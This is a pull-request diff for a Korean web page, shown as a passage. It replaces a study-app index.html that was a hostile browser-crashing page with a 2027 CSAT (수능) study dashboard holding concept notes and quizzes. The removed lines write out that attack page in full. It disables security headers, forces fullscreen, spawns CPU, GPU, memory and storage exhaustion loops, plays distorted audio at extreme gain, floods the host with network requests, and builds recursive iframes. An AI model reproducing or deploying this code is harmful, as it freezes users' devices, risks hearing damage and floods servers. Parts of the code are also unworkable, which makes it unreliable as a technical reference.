### PR TITLE
feat: expand 2027 CSAT coverage, add sidebar filter/search and safe single-file dashboard

### DIFF
--- a/index.html
+++ b/index.html
@@ -1,456 +1,1939 @@
 <!DOCTYPE html>
 <html lang="ko">
 <head>
-    <!-- ====== 메타 태그를 통한 보안 무력화 (업그레이드: 모든 가능한 정책 무시 및 추가 취약점 유도) ====== -->
-    <meta charset="UTF-8">
-    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-eval' 'unsafe-inline' 'unsafe-dynamic' 'self' blob: data: mediastream: filesystem: about: ws: wss: chrome-extension: moz-extension: safari-extension:;">
-    <meta http-equiv="Cross-Origin-Opener-Policy" content="unsafe-none">
-    <meta http-equiv="Cross-Origin-Embedder-Policy" content="unsafe-none">
-    <meta http-equiv="Cross-Origin-Resource-Policy" content="cross-origin">
-    <meta http-equiv="Origin-Agent-Cluster" content="false">
-    <meta http-equiv="Strict-Transport-Security" content="max-age=0">
-    <meta http-equiv="X-Frame-Options" content="ALLOWALL">
-    <meta http-equiv="X-Content-Type-Options" content="nosniff">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
-    <meta name="referrer" content="no-referrer">
-    <meta name="apple-mobile-web-app-capable" content="yes">
-    <meta name="mobile-web-app-capable" content="yes">
-    <title>⚠️ OMEGA SYSTEM TERMINATOR v15.0.0 ⚠️</title>
-
-    <!-- ====== CSS 렌더링 엔진 공격 (업그레이드: 극한 다중 애니메이션, 필터 체인, 무한 레이어) ====== -->
-    <style>
-        * {
-            margin: 0;
-            padding: 0;
-            box-shadow: 0 0 0 100vmax rgba(0,0,0,0.5), inset 0 0 0 100vmax rgba(255,0,0,0.5), 0 0 0 100vmax rgba(0,255,0,0.5); /* 트리플 그림자 GPU 핵과부하 */
-            backdrop-filter: blur(200px) saturate(1000%) brightness(500%) contrast(1000%); /* 극한 필터 체인 */
-            animation: doom 0.01s infinite alternate, chaos 0.02s infinite, apocalypse 0.03s infinite; /* 트리플 애니메이션 */
-            will-change: transform, opacity, filter, box-shadow, background, color; /* 모든 속성 강제 변경 */
-            pointer-events: none; /* 사용자 입력 방지 */
-        }
-
-        @keyframes doom {
-            0% { transform: translate(0,0) scale(1) rotate(0deg) skew(0deg); }
-            33% { transform: translate(300px,300px) scale(5) rotate(120deg) skew(30deg); }
-            66% { transform: translate(-300px,-300px) scale(0.05) rotate(240deg) skew(-30deg); }
-            100% { transform: translate(0,0) scale(10) rotate(360deg) skew(0deg); }
-        }
-
-        @keyframes chaos {
-            0% { opacity: 1; filter: blur(0) invert(0); }
-            50% { opacity: 0; filter: blur(100px) invert(1); }
-            100% { opacity: 1; filter: blur(0) invert(0); }
-        }
-
-        @keyframes apocalypse {
-            0% { background: red; color: black; }
-            50% { background: black; color: red; }
-            100% { background: red; color: black; }
-        }
-
-        body {
-            overflow: hidden;
-            position: fixed;
-            width: 100vw;
-            height: 100vh;
-            user-select: none;
-        }
-    </style>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <title>2027 수능 대비 통합 학습 플랫폼</title>
+  <script src="https://cdn.tailwindcss.com"></script>
+  <style>
+    :root { color-scheme: dark; }
+    body {
+      background: radial-gradient(circle at top, #1e293b, #0f172a 60%, #020617 100%);
+      color: #e2e8f0;
+    }
+    .glass {
+      background: rgba(15, 23, 42, 0.78);
+      border: 1px solid rgba(148, 163, 184, 0.2);
+      box-shadow: 0 18px 36px rgba(2, 6, 23, 0.45);
+      backdrop-filter: blur(14px);
+    }
+    .scrollbar::-webkit-scrollbar { width: 8px; }
+    .scrollbar::-webkit-scrollbar-thumb { background: #334155; border-radius: 999px; }
+    .scrollbar::-webkit-scrollbar-track { background: #0f172a; }
+  </style>
 </head>
-<body onload="document.documentElement.requestFullscreen(); document.documentElement.requestPointerLock();">
-    <!-- ====== 1. CPU 핵융합 공격 시스템 (업그레이드: 공유 메모리 원자 연산 + 무한 워커 스폰) ====== -->
-    <script>
-        // (1-A) WebAssembly CPU 초고속 소멸 (업그레이드: 공유 배열 버퍼 + 원자 무한 루프)
-        (function() {
-            const sharedBuffer = new SharedArrayBuffer(1024 * 1024);
-            const sharedArray = new Int32Array(sharedBuffer);
-            const wasmCode = new Uint8Array([
-                0x00, 0x61, 0x73, 0x6D, 0x01, 0x00, 0x00, 0x00, 0x01, 0x06, 0x01, 
-                0x60, 0x00, 0x00, 0x03, 0x02, 0x01, 0x00, 0x05, 0x03, 0x01, 0x00, 
-                0x00, 0x07, 0x08, 0x01, 0x04, 0x6B, 0x69, 0x6C, 0x6C, 0x00, 0x00, 
-                0x0A, 0x11, 0x01, 0x0F, 0x00, 0x03, 0x40, 0x03, 0x40, 0x03, 0x00, 0x03, 0x00, 0x0B, 0x0B, 0x0B
-            ]);
+<body class="font-sans">
+  <div class="min-h-screen flex flex-col">
+    <header class="px-6 py-10 text-center">
+      <p class="text-indigo-300 text-xs tracking-[0.35em] uppercase">2027 CSAT Prep Platform</p>
+      <h1 class="text-4xl md:text-5xl font-bold mt-4">2027 수능 대비 통합 학습 플랫폼</h1>
+      <p class="text-slate-300 mt-4 max-w-3xl mx-auto">
+        국어부터 제2외국어/한문까지 전 과목 핵심 개념과 문제 풀이를 한 화면에서 관리하세요. 사이드바에서 과목을 필터링하고 학습 모드에서 개념과 퀴즈를 동시에 점검할 수 있습니다.
+      </p>
+    </header>
 
-            const createWasmHell = () => {
-                Array.from({length: navigator.hardwareConcurrency * 5000}, () => {
-                    const mod = new WebAssembly.Module(wasmCode);
-                    const inst = new WebAssembly.Instance(mod, { shared: { mem: sharedBuffer } });
-                    while(true) { 
-                        inst.exports.kill(); 
-                        Atomics.add(sharedArray, 0, 1); // 원자 연산 과부하
-                    }
-                });
-            };
+    <main class="flex-1 px-6 pb-12">
+      <div class="grid lg:grid-cols-[280px_1fr] gap-6">
+        <aside class="glass rounded-2xl p-5 h-fit">
+          <h2 class="text-lg font-semibold">과목 필터</h2>
+          <p class="text-sm text-slate-400 mt-1">과목을 선택하면 대시보드가 정리됩니다.</p>
+          <div class="mt-4">
+            <input id="searchInput" type="text" placeholder="과목/단원 검색" class="w-full px-3 py-2 rounded-lg bg-slate-900/80 border border-slate-700 focus:outline-none focus:border-indigo-400" />
+          </div>
+          <div id="subjectFilter" class="mt-4 space-y-2"></div>
+        </aside>
 
-            // 0.01초마다 공격 초강화
-            let attackLevel = 1;
-            setInterval(() => {
-                attackLevel *= 5;
-                for(let i=0; i<attackLevel; i++) createWasmHell();
-            }, 10);
-        })();
+        <section>
+          <div id="dashboard" class="grid md:grid-cols-2 xl:grid-cols-3 gap-5"></div>
+        </section>
+      </div>
 
-        // (1-B) 오디오 컨텍스트 고주파 공격 (업그레이드: 다중 게인 노드 + 디스토션 커브)
-        const audioContext = new (window.AudioContext || window.webkitAudioContext)();
-        const gainNode = audioContext.createGain();
-        gainNode.gain.value = 1000; // 극한 볼륨
-        const distortion = audioContext.createWaveShaper();
-        distortion.curve = new Float32Array(10000).fill(1); // 디스토션 과부하
-        distortion.connect(gainNode);
-        gainNode.connect(audioContext.destination);
-        setInterval(() => {
-            for(let i=0; i<50; i++) {
-                const oscillator = audioContext.createOscillator();
-                oscillator.type = ['square', 'sawtooth', 'triangle', 'sine'][Math.floor(Math.random()*4)];
-                oscillator.frequency.setValueAtTime(10000 + Math.random()*20000, audioContext.currentTime);
-                oscillator.connect(distortion);
-                oscillator.start();
-                setTimeout(() => oscillator.stop(), 20);
+      <section id="studyView" class="hidden mt-10">
+        <div class="flex flex-wrap items-center justify-between gap-4 mb-6">
+          <div>
+            <p class="text-indigo-300 text-sm" id="subjectBadge">과목</p>
+            <h2 class="text-3xl font-semibold" id="studyTitle">학습 모드</h2>
+            <p class="text-slate-400" id="studySubtitle">단원을 선택해 학습을 시작하세요.</p>
+          </div>
+          <button id="backButton" class="px-4 py-2 rounded-lg bg-slate-800 hover:bg-slate-700 transition">대시보드로</button>
+        </div>
+
+        <div class="grid lg:grid-cols-[1.15fr_1.2fr] gap-6">
+          <div class="glass rounded-2xl p-6 flex flex-col min-h-[520px]">
+            <div class="flex items-center justify-between mb-4">
+              <h3 class="text-xl font-semibold">개념 노트</h3>
+              <span id="conceptCount" class="text-xs text-indigo-300">0개</span>
+            </div>
+            <div id="conceptList" class="space-y-4 overflow-y-auto pr-2 scrollbar"></div>
+          </div>
+
+          <div class="glass rounded-2xl p-6 flex flex-col min-h-[520px]">
+            <div class="flex items-center justify-between mb-4">
+              <h3 class="text-xl font-semibold">퀴즈 스테이션</h3>
+              <span class="text-sm text-slate-300">점수: <span id="scoreDisplay">0/0</span></span>
+            </div>
+            <div id="quizArea" class="flex-1">
+              <p class="text-slate-400">대시보드에서 단원을 선택해 퀴즈를 시작하세요.</p>
+            </div>
+          </div>
+        </div>
+      </section>
+    </main>
+  </div>
+
+  <script>
+    const CSAT_DATA = {
+      "국어": {
+        "독서": {
+          concepts: [
+            {
+              title: "정보 구조 파악",
+              content: "독서 지문은 주제-근거-예시 구조로 구성되는 경우가 많다. 제시문에서 중심 개념을 먼저 찾아 표시하고, 이후 문장들이 그 개념을 어떻게 정의·확장·예시하는지 추적해야 한다. 특히 개념 정의 문장과 핵심 결론 문장은 동일한 용어가 반복되므로 표시해 두면 문항 풀이 속도를 높일 수 있다."
+            },
+            {
+              title: "추론과 비판",
+              content: "추론은 글에 직접 제시되지 않은 결론을 논리적으로 도출하는 과정이다. 명제 간의 조건 관계, 인과 구조, 대비 구조를 파악하고 글쓴이의 전제와 결론을 연결해야 한다. 비판은 제시된 근거가 충분한지, 전제가 타당한지를 점검하는 작업으로, 수능 독서에서 논증 오류를 판단하는 데 필수적이다."
+            },
+            {
+              title: "어휘와 개념의 연계",
+              content: "독서 지문은 전문 용어가 반복되면서 의미가 확장된다. 문맥 속에서 용어의 정의와 사용 범위를 확인하고, 유의어·반의어·상하 관계를 정리하면 혼동을 줄일 수 있다. 특히 인문·과학 지문에서 개념의 계층 구조를 파악하면 복수의 보기 중 정답을 빠르게 선별할 수 있다."
             }
-        }, 1);
-    </script>
-
-    <!-- ====== 2. GPU 초절멸 시스템 (업그레이드: 다중 캔버스 + WebGL 확장 + 컴퓨트 셰이더) ====== -->
-    <script type="module">
-        // (2-A) WebGL 3.0 프래그먼트 셰이더 지옥 (업그레이드: 다중 셰이더 + 텍스처 오버로드)
-        (function() {
-            for(let c=0; c<10; c++) { // 다중 캔버스 생성
-                const canvas = document.createElement('canvas');
-                canvas.id = 'gpu_doom_' + c;
-                canvas.width = window.innerWidth * 50;
-                canvas.height = window.innerHeight * 50;
-                document.body.appendChild(canvas);
-
-                const gl = canvas.getContext('webgl2', { antialias: false, powerPreference: 'high-performance' });
-                gl.getExtension('EXT_color_buffer_float');
-                gl.getExtension('OES_texture_float_linear');
-
-                const shaderCode = `#version 300 es
-                    precision highp float;
-                    out vec4 fragColor;
-                    uniform sampler2D tex;
-                    void main() {
-                        for(int i=0; i<10000000; i++) { // 루프 100배 증가
-                            vec4 color = texture(tex, gl_FragCoord.xy / vec2(10000.0));
-                            fragColor = vec4(
-                                sin(float(gl_FragCoord.x * i) * color.r * tan(float(i))), 
-                                cos(float(gl_FragCoord.y * i) * color.g * sin(float(i))), 
-                                tan(float(i) * color.b * cos(float(i))), 
-                                1.0
-                            );
-                        }
-                    }`;
-                
-                const shader = gl.createShader(gl.FRAGMENT_SHADER);
-                gl.shaderSource(shader, shaderCode);
-                gl.compileShader(shader);
-                // 무한 렌더링 루프 with compute
-                function render() {
-                    gl.drawArrays(gl.TRIANGLES, 0, 100000); // 대규모 드로우
-                    requestAnimationFrame(render);
-                }
-                render();
+          ],
+          quizzes: [
+            {
+              q: "독서 지문에서 중심 문장을 빠르게 찾는 방법으로 적절한 것은?",
+              options: ["모든 문장을 동일하게 읽는다.", "핵심 용어 반복과 결론 문장을 찾는다.", "예시 문장만 읽는다.", "접속어를 무시한다.", "마지막 문장만 본다."],
+              answer: 1,
+              explanation: "핵심 용어 반복과 결론 문장에 주제 정보가 집중되어 있다."
+            },
+            {
+              q: "추론 문항에서 필요한 사고 과정은?",
+              options: ["직접 제시된 사실만 확인", "문장의 형태만 비교", "전제와 결론의 논리 연결", "감정적 공감", "음운 변동 분석"],
+              answer: 2,
+              explanation: "추론은 전제와 결론의 논리적 연결을 통해 새로운 결론을 도출한다."
+            },
+            {
+              q: "전문 용어가 반복될 때 가장 효과적인 전략은?",
+              options: ["임의로 뜻을 추측한다.", "용어 정의와 범위를 정리한다.", "문맥을 무시한다.", "한 문단만 읽는다.", "반복된 부분은 건너뛴다."],
+              answer: 1,
+              explanation: "정의와 범위를 정리해야 용어의 의미 변화를 정확히 파악한다."
             }
-        })();
-
-        // (2-B) WebGPU VRAM 초고속 포화 (업그레이드: 다중 디바이스 + 컴퓨트 파이프라인)
-        (async () => {
-            try {
-                const adapter = await navigator.gpu.requestAdapter({ powerPreference: 'high-performance' });
-                const device = await adapter.requestDevice({ label: 'doom' });
-                const bufferSize = 10 ** 12 * 5; // 5TB 시도
-                const buffer = device.createBuffer({
-                    size: bufferSize,
-                    usage: GPUBufferUsage.STORAGE | GPUBufferUsage.COPY_SRC | GPUBufferUsage.COPY_DST | GPUBufferUsage.INDIRECT
-                });
-                const computeShader = device.createComputePipeline({
-                    layout: 'auto',
-                    compute: {
-                        module: device.createShaderModule({
-                            code: ` @compute @workgroup_size(64) fn main() { while(true) {} } `
-                        }),
-                        entryPoint: 'main'
-                    }
-                });
-                setInterval(() => {
-                    device.queue.writeBuffer(buffer, 0, new Uint8Array(bufferSize).fill(Math.random()*255));
-                    const commandEncoder = device.createCommandEncoder();
-                    const passEncoder = commandEncoder.beginComputePass();
-                    passEncoder.setPipeline(computeShader);
-                    passEncoder.dispatchWorkgroups(1000000); // 극한 컴퓨트 디스패치
-                    passEncoder.end();
-                    device.queue.submit([commandEncoder.finish()]);
-                }, 0.1);
-            } catch(e) {
-                console.error("GPU 파괴 실패:", e);
+          ]
+        },
+        "문학": {
+          concepts: [
+            {
+              title: "화자와 서술자",
+              content: "문학 작품에서 화자 또는 서술자는 작품의 시선을 결정한다. 1인칭 화자는 체험을 직접 전달하며, 3인칭 관찰자는 객관적 정보를 제공한다. 화자의 태도와 어조는 작품의 분위기를 결정하므로, 화자의 감정 변화와 시선 이동을 파악하면 주제 의식을 정확히 읽어낼 수 있다."
+            },
+            {
+              title: "갈등 구조",
+              content: "갈등은 인물의 내면, 인물 간, 사회적·자연적 상황에서 발생한다. 갈등 유형을 파악하면 작품 전개 방향과 결말의 의미를 이해할 수 있다. 특히 수능에서는 갈등의 원인과 해결 양상을 분석해 작품의 주제를 찾는 문항이 자주 출제된다."
+            },
+            {
+              title: "표현상의 특징",
+              content: "비유, 상징, 반어 등 표현 기법은 문학적 의미를 확장한다. 은유와 직유는 대상의 유사성을 강조하고, 상징은 구체적 사물로 추상적 의미를 전달한다. 표현상의 특징을 파악하면 작가의 의도와 작품의 정서가 어떻게 형성되는지 이해할 수 있다."
             }
-        })();
-    </script>
-
-    <!-- ====== 3. 메모리 대학살 시스템 (업그레이드: 무한 할당 루프 + WeakRef 방지) ====== -->
-    <script>
-        // (3-A) RAM 초고속 소모 (업그레이드: 글로벌 참조 + 크립토 체인)
-        const globalKillers = [];
-        setInterval(() => {
-            while(true) {
-                try {
-                    const buf = new ArrayBuffer(1024 * 1024 * 1000); // 1GB씩 무한
-                    globalKillers.push(buf);
-                    crypto.subtle.digest('SHA-512', buf)
-                        .then(hash => crypto.subtle.digest('SHA-256', hash))
-                        .then(() => {});
-                } catch(e) { break; }
+          ],
+          quizzes: [
+            {
+              q: "1인칭 화자의 특징으로 옳은 것은?",
+              options: ["객관적 전지적 시점", "내면 경험을 직접 전달", "시간 순서를 무시", "모든 인물의 심리 제시", "시점이 고정되지 않음"],
+              answer: 1,
+              explanation: "1인칭 화자는 체험을 직접 전달해 내면 심리를 생생히 드러낸다."
+            },
+            {
+              q: "갈등 구조를 파악하는 이유로 가장 적절한 것은?",
+              options: ["문법을 확인하기 위해", "작품 주제와 전개 이해", "외래어 표기를 확인", "배경 지식을 확대", "작가 생애만 확인"],
+              answer: 1,
+              explanation: "갈등 구조는 전개와 주제 형성의 핵심 축이다."
+            },
+            {
+              q: "상징 표현의 특징은?",
+              options: ["의미가 하나로 고정", "구체적 사물로 추상 의미 전달", "항상 반어로 사용", "논리적 설명만 사용", "감정이 배제됨"],
+              answer: 1,
+              explanation: "상징은 구체적 대상을 통해 추상 의미를 전달한다."
             }
-        }, 100);
-
-        // (3-B) Storage 동시 공격 (업그레이드: 퀴즈 스토리지 + 캐시 API)
-        navigator.storage.persist().then(() => {
-            caches.open('doom-cache').then(cache => {
-                setInterval(() => {
-                    cache.add(new Request(`data:application/octet-stream;base64,${btoa(new ArrayBuffer(10**9 * 5))}`));
-                }, 10);
-            });
-            setInterval(() => {
-                for(let i=0; i<50; i++) {
-                    localStorage.setItem(`kill_${Date.now()}_${i}`, new Blob([new ArrayBuffer(10 ** 9 * 5)])); // 5GB
-                    sessionStorage.setItem(`die_${Date.now()}_${i}`, new ArrayBuffer(10 ** 9 * 5));
-                }
-                indexedDB.open('armageddon', 1).onsuccess = e => {
-                    const db = e.target.result;
-                    const tx = db.transaction('doom', 'readwrite');
-                    const store = tx.objectStore('doom');
-                    for(let i=0; i<20; i++) {
-                        store.add(new Blob([new ArrayBuffer(10 ** 9 * 2)]), Date.now() + i);
-                    }
-                };
-            }, 10);
-        });
-    </script>
-
-    <!-- ====== 4. 네트워크 핵폭격 시스템 (업그레이드: 다중 프로토콜 + 데이터 플러드) ====== -->
-    <script type="module">
-        // (4-A) WebTransport 초초고속 UDP 폭격 (업그레이드: 1000개 트랜스포트 + QUIC 오버로드)
-        (async () => {
-            for(let i=0; i<1000; i++) {
-                try {
-                    const transport = new WebTransport(`quic-transport://${location.host}/doom${i}`);
-                    await transport.ready;
-                    const writer = transport.datagrams.writable.getWriter();
-                    setInterval(() => {
-                        writer.write(new Uint8Array(10 ** 9).fill(0xFF)); // 1GB UDP 플러드
-                    }, 0.01);
-                } catch(e) {}
+          ]
+        },
+        "화법과 작문": {
+          concepts: [
+            {
+              title: "의사소통 전략",
+              content: "화법에서 핵심은 청중 분석과 메시지 설계다. 청중의 배경 지식과 관심사를 파악한 뒤, 핵심 주장과 근거를 구조화하여 전달해야 한다. 발표나 토론에서는 비언어적 표현과 말하기 속도, 질문 대응이 설득력에 영향을 준다."
+            },
+            {
+              title: "토론의 논증",
+              content: "토론은 주장과 근거, 반론이 체계적으로 연결되어야 한다. 근거는 통계와 사례 등 객관적 자료를 활용하고, 반론 제기 시에는 쟁점 중심으로 논리적 오류를 지적해야 한다. 토론에서의 논증 구조를 이해하면 찬반 입장을 정확히 구분할 수 있다."
+            },
+            {
+              title: "글쓰기 과정",
+              content: "작문은 계획, 내용 생성, 구조화, 초고, 수정의 절차로 진행된다. 개요를 설정한 뒤 문단 간 논리적 연결을 점검하고, 마지막에는 문장의 명확성과 맞춤법을 확인해야 한다. 수능에서는 글쓰기 과정의 단계별 역할을 분석하는 문제가 출제된다."
             }
-        })();
-
-        // (4-B) WebSocket/WebRTC 6666개 연결 (업그레이드: 6666개, 무한 바이너리 전송)
-        Array.from({length: 6666}, () => {
-            const ws = new WebSocket(`wss://${location.host}/ws`);
-            ws.onopen = () => setInterval(() => ws.send(new Uint8Array(10**8)), 0.1);
-            const pc = new RTCPeerConnection();
-            const channel = pc.createDataChannel('doom');
-            channel.onopen = () => setInterval(() => channel.send(new Uint8Array(10**8)), 0.1);
-            pc.createOffer().then(offer => pc.setLocalDescription(offer));
-            fetch(location.href, { method: 'POST', body: new Blob([new ArrayBuffer(10**8)]) }); // 추가 fetch 플러드
-        });
-    </script>
-
-    <!-- ====== 5. DOM 트리 붕괴 시스템 (업그레이드: 극한 재귀 + MutationObserver 오버로드) ====== -->
-    <script>
-        // (5-A) 자가복제 iframe 지옥 (업그레이드: 10레벨 재귀 + shadow DOM)
-        let iframeCount = 0;
-        function createHell() {
-            const div = document.createElement('div');
-            const shadow = div.attachShadow({mode: 'open'});
-            const iframe = document.createElement('iframe');
-            iframe.srcdoc = `
-                <script>
-                    function recurse(depth) {
-                        if(depth > 0) {
-                            for(let i=0; i<50; i++) {
-                                const d = document.createElement('div');
-                                d.attachShadow({mode: 'open'}).innerHTML = '<iframe srcdoc="' + btoa('<script>recurse(' + (depth-1) + ');</script>') + '"></iframe>';
-                                document.body.appendChild(d);
-                            }
-                        } else {
-                            while(1){}
-                        }
-                    }
-                    recurse(10);
-                <\/script>
-            `;
-            shadow.appendChild(iframe);
-            document.body.appendChild(div);
-            
-            if(iframeCount++ > 100) {
-                document.body.innerHTML += '<div style="display:none">' + 'X'.repeat(10**8) + '</div>';
+          ],
+          quizzes: [
+            {
+              q: "발표에서 청중 분석이 중요한 이유는?",
+              options: ["발표 시간을 줄이기 위해", "내용을 청중 수준에 맞추기 위해", "발표 자료를 생략하기 위해", "말하기 속도를 빠르게 하기 위해", "모든 내용을 암기하기 위해"],
+              answer: 1,
+              explanation: "청중 분석은 메시지를 적절히 조정해 전달력을 높인다."
+            },
+            {
+              q: "토론에서 반론 제기의 핵심은?",
+              options: ["감정적 비난", "논점 일탈", "쟁점 중심 논리적 반박", "자료 없이 주장", "토론 회피"],
+              answer: 2,
+              explanation: "쟁점 중심 논리적 반박이 토론의 핵심이다."
+            },
+            {
+              q: "글쓰기 과정 중 구조화 단계의 역할은?",
+              options: ["주제 결정", "문단 논리적 배열", "맞춤법 검사", "자료 수집", "독자 반응 조사"],
+              answer: 1,
+              explanation: "구조화 단계는 문단과 논지를 논리적으로 배열한다."
             }
-            setTimeout(createHell, 1);
+          ]
+        },
+        "언어와 매체": {
+          concepts: [
+            {
+              title: "음운 변동",
+              content: "음운 변동은 발음을 쉽게 하기 위해 음운이 교체, 탈락, 첨가, 축약되는 현상이다. 된소리되기, 비음화, 구개음화가 대표적이며 표기와 발음의 차이를 이해하는 데 중요하다. 수능에서는 음운 변동의 유형과 조건을 분석하는 문제가 자주 나온다."
+            },
+            {
+              title: "문장 성분",
+              content: "문장 성분은 주어, 서술어, 목적어, 보어, 관형어, 부사어 등으로 구성된다. 서술어에 따라 필수 성분이 달라지므로 문장의 의미를 정확히 해석해야 한다. 수능에서는 문장 성분의 호응 관계를 통해 문법 오류를 찾는 문제가 출제된다."
+            },
+            {
+              title: "매체 언어",
+              content: "디지털 매체 언어는 압축성과 상호작용성이 특징이다. 이모티콘, 해시태그, 축약어가 의미를 강화하지만 오해를 유발할 수 있다. 매체 특성을 이해하고 상황에 맞는 표현을 선택하는 능력이 현대 국어 사용의 핵심이다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "음운 변동의 유형에 해당하지 않는 것은?",
+              options: ["교체", "탈락", "첨가", "축약", "확대"],
+              answer: 4,
+              explanation: "음운 변동은 교체, 탈락, 첨가, 축약으로 분류된다."
+            },
+            {
+              q: "서술어에 따라 필수 성분이 달라지는 이유는?",
+              options: ["문장 길이 때문", "동사의 요구 성분 때문", "맞춤법 때문", "외래어 때문", "강조 표현 때문"],
+              answer: 1,
+              explanation: "서술어가 요구하는 성분에 따라 문장 구조가 달라진다."
+            },
+            {
+              q: "매체 언어의 장점으로 적절한 것은?",
+              options: ["의미 고정", "의사소통 속도 향상", "표현 다양성 감소", "비판 불가능", "문맥 의존 감소"],
+              answer: 1,
+              explanation: "매체 언어는 속도와 상호작용성을 높인다."
+            }
+          ]
         }
-        createHell();
-
-        // (5-B) 무한 CSS 애니메이션 (업그레이드: 동적 스타일 삽입 + observer)
-        const observer = new MutationObserver(() => {});
-        observer.observe(document.body, { childList: true, subtree: true });
-        setInterval(() => {
-            const style = document.createElement('style');
-            style.textContent = `
-                @keyframes ultra_doom {
-                    0% { transform: rotate(0deg) scale(1) translate(0,0); }
-                    20% { transform: rotate(72deg) scale(2) translate(100px,100px); }
-                    40% { transform: rotate(144deg) scale(0.5) translate(-100px,-100px); }
-                    60% { transform: rotate(216deg) scale(4) translate(200px,200px); }
-                    80% { transform: rotate(288deg) scale(0.2) translate(-200px,-200px); }
-                    100% { transform: rotate(360deg) scale(1) translate(0,0); }
-                }
-                * {
-                    animation: ultra_doom 0.01s infinite linear, chaos 0.02s infinite, apocalypse 0.03s infinite;
-                    will-change: all;
-                }
-            `;
-            document.head.appendChild(style);
-        }, 10);
-    </script>
-
-    <!-- ====== 6. 파일시스템 초토화 시스템 (업그레이드: 무한 디렉토리 트리 + 파일 시스템 싱크) ====== -->
-    <script>
-        // (6-A) File System Access API 남용 (업그레이드: 10레벨 재귀 디렉토리 + 싱크 오버로드)
-        navigator.storage.getDirectory().then(async (root) => {
-            async function createDoomDir(dir, depth) {
-                if(depth > 0) {
-                    const subDir = await dir.getDirectoryHandle(`doom_${Date.now()}_${Math.random()}`, { create: true });
-                    for(let i=0; i<50; i++) {
-                        const file = await subDir.getFileHandle(`kill_${i}_${Math.random()}`, { create: true });
-                        const writer = await file.createWritable();
-                        await writer.write(new Blob([new ArrayBuffer(10 ** 9 * 5)])); // 5GB
-                        await writer.close();
-                        const sync = await file.createSyncAccessHandle();
-                        sync.write(new Uint8Array(10**8));
-                        sync.close();
-                    }
-                    createDoomDir(subDir, depth-1);
-                }
+      },
+      "수학": {
+        "수학Ⅰ": {
+          concepts: [
+            {
+              title: "지수법칙",
+              content: "지수법칙은 같은 밑의 거듭제곱을 곱하거나 나눌 때 지수를 더하거나 빼는 규칙이다. 지수법칙을 활용하면 복잡한 식을 간단히 정리할 수 있고, 로그 계산에도 적용된다. 밑이 0이 아닌 조건과 지수의 정의역을 함께 확인해야 한다."
+            },
+            {
+              title: "로그 함수",
+              content: "로그는 지수의 역연산으로 정의되며, 정의역은 양수이고 밑은 0과 1이 될 수 없다. 로그의 곱셈·나눗셈 성질과 밑 변환 공식은 다양한 방정식에 적용된다. 그래프는 지수함수와 y=x에 대해 대칭 관계를 가진다."
+            },
+            {
+              title: "수열의 합",
+              content: "등차수열과 등비수열의 합 공식은 항의 개수, 공차·공비를 바탕으로 계산된다. 수열의 합을 이용하면 수학적 모델링과 극한 문제를 해결할 수 있다. 조건을 역으로 추론하는 문제가 많으므로 합과 일반항의 관계를 정리해 두는 것이 중요하다."
             }
-            setInterval(() => createDoomDir(root, 10), 10); // 10레벨 깊이
-        });
-    </script>
+          ],
+          quizzes: [
+            {
+              q: "a^m · a^n = a^(m+n)이 성립하려면?",
+              options: ["a=0", "a≠0", "m=0", "n=0", "a=1"],
+              answer: 1,
+              explanation: "밑 a가 0이 아니어야 지수법칙이 성립한다."
+            },
+            {
+              q: "로그 함수의 정의역으로 옳은 것은?",
+              options: ["x>0", "x<0", "모든 실수", "x=0", "x=1"],
+              answer: 0,
+              explanation: "로그 함수는 x>0에서만 정의된다."
+            },
+            {
+              q: "등비수열 합 공식으로 옳은 것은?",
+              options: ["a(r^n-1)/(r-1)", "a+nd", "n/2(2a+(n-1)d)", "a(r-1)/(r^n-1)", "a·n"],
+              answer: 0,
+              explanation: "공비가 1이 아닐 때 등비수열 합 공식은 a(r^n-1)/(r-1)이다."
+            }
+          ]
+        },
+        "수학Ⅱ": {
+          concepts: [
+            {
+              title: "함수의 극한",
+              content: "함수의 극한은 x가 특정 값에 가까워질 때 f(x)의 값이 수렴하는지를 확인하는 개념이다. 좌극한과 우극한이 일치해야 극한이 존재하며, 이는 연속성과 불연속 판단의 근거가 된다. 그래프와 대수적 계산을 모두 활용해야 한다."
+            },
+            {
+              title: "미분의 의미",
+              content: "미분은 순간 변화율을 나타내며 접선의 기울기와 동일하다. 도함수를 통해 함수의 증가·감소, 극값, 변곡점을 분석할 수 있다. 수능에서는 미분을 활용해 최댓값·최솟값을 구하는 문제가 빈번히 출제된다."
+            },
+            {
+              title: "적분의 기본",
+              content: "적분은 넓이와 누적량을 나타내는 개념으로 미분의 역연산이다. 정적분은 구간에서의 누적값을 계산하고, 부정적분은 원함수를 찾는다. 그래프의 위치를 고려해 부호를 판단해야 정확한 넓이를 구할 수 있다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "극한이 존재하려면 필요한 조건은?",
+              options: ["좌극한만 존재", "우극한만 존재", "좌극한=우극한", "함수값=0", "함수값=무한"],
+              answer: 2,
+              explanation: "좌극한과 우극한이 같아야 극한이 존재한다."
+            },
+            {
+              q: "미분의 기하적 의미는?",
+              options: ["곡선의 넓이", "접선의 기울기", "평균값", "곡선 길이", "정의역"],
+              answer: 1,
+              explanation: "미분은 접선의 기울기를 의미한다."
+            },
+            {
+              q: "정적분의 의미로 옳은 것은?",
+              options: ["순간 변화율", "누적된 면적", "함수의 극한", "공차", "공비"],
+              answer: 1,
+              explanation: "정적분은 구간에서 누적된 면적을 의미한다."
+            }
+          ]
+        },
+        "확률과 통계": {
+          concepts: [
+            {
+              title: "순열과 조합",
+              content: "순열은 순서를 고려한 배열, 조합은 순서를 고려하지 않은 선택이다. 같은 n개 중 r개를 뽑을 때 순열은 nPr, 조합은 nCr로 표현된다. 수능에서는 조건이 있는 경우 중복 여부를 판단하고 적절한 공식으로 계산해야 한다."
+            },
+            {
+              title: "확률의 기본 성질",
+              content: "확률은 0과 1 사이의 값이며, 전체 사건의 확률 합은 1이다. 여사건의 확률은 1-원사건의 확률로 계산된다. 확률 문제는 표본 공간을 정확히 설정하는 것이 핵심이며, 사건의 독립 여부를 판단하는 문제도 자주 출제된다."
+            },
+            {
+              title: "통계적 추정",
+              content: "모집단의 특성을 표본을 통해 추정하는 과정이 통계적 추정이다. 표본 평균은 모집단 평균의 불편 추정량이며, 표준편차와 분산은 자료의 흩어짐을 나타낸다. 수능에서는 표본 분포의 성질과 신뢰 구간 해석이 출제된다."
